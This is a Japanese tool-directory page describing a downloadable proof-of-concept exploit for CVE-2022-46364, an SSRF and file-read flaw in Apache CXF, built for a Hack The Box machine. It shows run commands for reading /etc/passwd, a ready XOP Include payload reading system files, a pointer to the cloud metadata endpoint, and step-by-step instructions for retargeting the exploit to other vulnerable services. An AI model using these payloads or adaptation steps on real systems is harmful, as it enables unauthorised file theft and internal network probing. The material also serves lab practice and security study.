Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-46364 — CVE-2022-46364の概念実証エクスプロイト。これはApache CXFのSSRF脆弱性であり、細工されたMTOM/XOP SOAPリクエストを介して任意のファイル読み取りと内部ネットワーク調査を可能にします。 | Kitploit
ツール/GitHubGitHub/c0gnit00/cve-2022-46364
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

CVE-2022-46364の概念実証エクスプロイト。これはApache CXFのSSRF脆弱性であり、細工されたMTOM/XOP SOAPリクエストを介して任意のファイル読み取りと内部ネットワーク調査を可能にします。

リポジトリを見る
42ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF(ファイル読み取り)

CVE-2022-46364 の概念実証エクスプロイト — Apache CXFのMTOM/XOPリクエスト処理におけるサーバーサイドリクエストフォージェリ(SSRF)脆弱性。


脆弱性の概要

CVE-2022-46364 は、Apache CXF バージョン 3.4.10 および 3.5.5 より前のバージョンに影響します。SOAP サービスで MTOM(Message Transmission Optimization Mechanism)が有効になっている場合、CXF のアンマーシャラーは <xop:Include> 要素内の href 属性を誤って検証します。W3C XOP 仕様で要求されているように href を cid: URI に制限する代わりに、CXF は file://、http://、https:// を含む任意の URI を逆参照します。

これにより、認証されていない攻撃者は以下を実行できます:

  • 任意のローカルファイルの読み取り(file:///etc/passwd)
  • 内部サービスに対する SSRF の実行(http://169.254.169.254/)
  • クラウドメタデータエンドポイントや内部 API への到達の可能性

ターゲット

このPoCは Hack The Box マシンに対して作成およびテストされました:

ターゲットエンドポイント: http://devarea.htb:8080/employeeservice

ただし、ターゲットのWSDLに応じてXMLペイロードを少し変更することで、ターゲット環境に適応できます。


使用方法

/etc/passwd の読み取り(デフォルトターゲット)

デフォルトのURLは http://devarea.htb:8080/employeeservice です。

python3 CVE-2022-46364.py --file /etc/passwd

カスタムターゲットURL

python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd

詳細モード — リクエストと生のレスポンスを表示

python3 CVE-2022-46364.py --file /etc/passwd --verbose

他のターゲットへの適応

重要: このスクリプトはHTB DevAreaのWSDL構造にハードコードされています。別の脆弱なApache CXFサービスに対して使用するには、ターゲットのWSDL契約に合わせて build_payload() 内のSOAPペイロードを修正する必要があります。

適応の手順:

  1. WSDLを取得する ターゲットから:

    curl http://target:8080/employeeservice?wsdl
    
  2. サービスの詳細を特定する:

    • targetNamespace(例:http://devarea.htb/)
    • 操作名(例:submitReport)
    • パラメータ構造(例:ネストされた <content> を持つ <arg0>)
  3. ペイロードを修正する build_payload() 内で:

    • 名前空間を更新する(xmlns:dev="...")
    • 操作名を更新する(<dev:submitReport>)
    • パラメータラッパーを更新する(<arg0>)
    • サーバーが添付ファイルとして処理するフィールド内に <xop:Include href="file://{filepath}"/> を配置する
  4. --url を更新する スクリプト実行時。

WSDL適応の例

次のWSDLスニペットがある場合:

<wsdl:definitions targetNamespace="http://example.com/">
  <wsdl:operation name="uploadDocument">
    <wsdl:input message="tns:uploadDocument"/>
  </wsdl:operation>
</wsdl:definitions>

ペイロードは次のようになります:

<soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
  <soapenv:Body>
    <ex:uploadDocument>
      <document>
        <xop:Include href="file:///etc/passwd"/>
      </document>
    </ex:uploadDocument>
  </soapenv:Body>
</soapenv:Envelope>

動作原理

  1. スクリプトは Content-Type: application/xop+xml を使用して multipart/related HTTPリクエストを作成します。
  2. SOAPボディ内に <xop:Include href="file:///etc/passwd"/> 要素が配置されます。
  3. 脆弱なCXFサーバーはこれを添付ファイル参照として扱い、file:// URIを逆参照します。
  4. ファイルの内容が読み取られ、サーバーによってbase64エンコードされ、SOAPの <return> 要素内に返されます。
  5. スクリプトは Content: の後のbase64文字列を抽出し、デコードします。

参照

リソースリンク
Apache CXF セキュリティ勧告CVE-2022-46364
NVD エントリNVD — CVE-2022-46364
Apache Jira (CXF-8706)CXF-8706
W3C XOP 仕様XML-binary Optimized Packaging
Penligent 詳細解説CVE-2022-46364 PoC in Practice
HTB DevAreaHack The Box — DevArea

免責事項

このツールは許可されたセキュリティテストおよび教育目的のみを意図しています。所有していないシステムをテストする前に、必ず明示的な許可を得てください。作者はこのスクリプトによって引き起こされた誤用や損害について一切の責任を負いません。


ライセンス

MIT ライセンス — 適切な帰属表示のもとで自由に使用、修正、共有できます。

ツールをダウンロード